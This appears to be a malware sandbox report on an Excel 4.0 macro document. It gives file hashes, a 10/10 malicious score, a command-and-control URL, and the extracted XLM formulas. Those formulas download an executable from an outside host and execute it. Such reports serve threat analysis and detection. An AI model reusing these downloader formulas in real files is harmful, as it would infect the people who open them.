Overview

overview

10

Static

static

10

97c801b0d4...d7.xls

windows7-x64

10

97c801b0d4...d7.xls

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    97c801b0d452c09ea39f37683dfd254cd6aeb9de774b1da8c0da1ded9496cdd7

  • Size

    100KB

  • MD5

    5447ecd009a4b6f831797ab285495068

  • SHA1

    215ba7331478a6291fbbc08f5eb8a8388cf9fe8f

  • SHA256

    97c801b0d452c09ea39f37683dfd254cd6aeb9de774b1da8c0da1ded9496cdd7

  • SHA512

    c6a069d1899b79d9d9e152fa0c784bd114d7d4645587ca43c45a1a8b855fec8a4ea7603205b56f62113eaf16c2176aa2cbd94d741c63dcb8aebfcdc1846a105c

  • SSDEEP

    3072:GqxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAmVE+cPXVrwums72ity3mJ4Nd1d0:RxEtjPOtioVjDGUU1qfDlavx+W2QnAma

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 97c801b0d452c09ea39f37683dfd254cd6aeb9de774b1da8c0da1ded9496cdd7
    .xls windows office2003